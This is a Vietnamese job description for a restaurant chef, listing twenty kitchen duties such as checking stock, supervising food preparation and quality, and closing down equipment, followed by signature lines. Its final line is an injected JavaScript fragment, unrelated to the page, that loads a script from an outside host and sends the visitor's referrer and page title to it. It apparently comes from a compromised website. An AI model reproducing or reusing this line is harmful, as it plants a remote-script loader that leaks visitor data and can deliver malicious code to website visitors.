Bảng mô tả công việc đầu bếp trong kinh doanh nhà hàng

BẢNG MÔ TẢ CÔNG VIỆC ĐẦU BẾP

I/ THÔNG TIN CÔNG VIỆC:

Chức danh            Đầu bếp Thời gian làm việc
Bộ phận            Bếp Ca
Quản lý trực tiếp            Bếp trưởng Ngày nghỉ
Quản lý gián tiếp            Quản lý bếp  

II/ MỤC ĐÍCH CÔNG VIỆC:

Thực hiện các công việc liên quan đến chế biến món ăn thuộc bếp

III/ NHIỆM VỤ CỤ THỂ:

Stt Nhiệm vụ
1 Kiểm tra nguyên liệu, thực phẩm tồn để xác định số lượng hàng hoá, nguyên liệu cần Order.
2 Kiểm tra hàng hoá trước khi nhập.
3 Trực tiếp thông báo về các món ăn tạm ngừng phục vụ hoặc món đặc biệt trong ngày, đảm bảo các nhân viên trong bộ phận và nhân viên các bộ phận liên quan đều nắm rõ.
4 Chuẩn bị và phối hợp với các bếp khác cung cấp kịp thời, chính xác các món ăn trong phiếu yêu cầu (order) của khách hàng.
5 Tư vấn trực tiếp cho khách hàng về các món ăn nếu khách hàng có yêu cầu.
6 Tiếp nhận Order của khách hàng, phân công nhân viên trong bộ phận thực hiện. Yêu cầu các bếp khác hỗ trợ khi cần thiết.
7 Hỗ trợ nhân viên bộ phận thực hiện công việc kịp thời khi nhân viên gặp khó khăn.
8 Kiểm tra, giám sát quá trình nhân viên làm và chế biến món ăn.
9 Kiểm tra về số lượng, chất lượng món ăn, đảm bảo món ăn đã được chuẩn bị và chế biến theo đúng quy trình, tiêu chuẩn số lượng, định lượng chất lượng của Công ty, phù hợp với các yêu cầu về vệ sinh thực phẩm.
10 Đánh số bàn vào các món sau khi kiểm tra chất lượng, chuyển cho nhân viên Chạy bàn.
11 Giải quyết kịp thời các trường hợp chuyển, trang trí, chia, định lượng thức ăn không theo đúng các tiêu chuẩn và trình tự của nhà hàng.
12 Trực tiếp giải quyết các thắc mắc của khách hàng, khắc phục các sai sót của nhân viên.
13 Thường xuyên kiểm tra việc đáp ứng các Order có đúng, đủ, đảm bảo chất lượng không.
14 Hỗ trợ bộ phận khác thực hiện công việc khi cần thiết.
15 Kiểm tra lần cuối hệ thống bếp, đèn, quạt, thông gió và các máy móc, thiết bị khác trước khi nghỉ. Đảm bảo tủ lạnh, tủ mát phải hoạt động tốt và theo đúng nhiệt độ tiêu chuẩn.
16 Tổng hợp các Order trong ngày vào báo cáo và chuyển cho thu ngân (mẫu báo cáo phải ghi rõ tổng số liên order của ca đó).
17 Đào tạo kỹ năng, nghiệp vụ, hướng dẫn công việc cho nhân viên mới.
18 Phân công ca, kiểm tra công việc của nhân viên, căn cứ mức độ hoàn thành nhiệm vụ để đề nghị thưởng phạt.
19 Quản lý việc sử dụng thực phẩm, bảo đảm sử dụng thực phẩm luân phiên theo nguyên tắc nhập trước, xuất trước.
20 Quản lý, sử dụng hợp lý, tiết kiệm hàng hoá, thực phẩm, điện, nước, ga…

 IV/ CÔNG VIỆC HÀNG NGÀY:

Theo kế hoạch công việc ngày.

V/ CHẾ ĐỘ BÁO CÁO:

Theo quy định chế độ báo cáo của nhà hàng.

 

Kinh doanh nhà hàng, ngày   tháng   năm 20..

Đầu bếp Bếp trưởng Quản lý bếp Phòng HCNS Giám đốc

s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;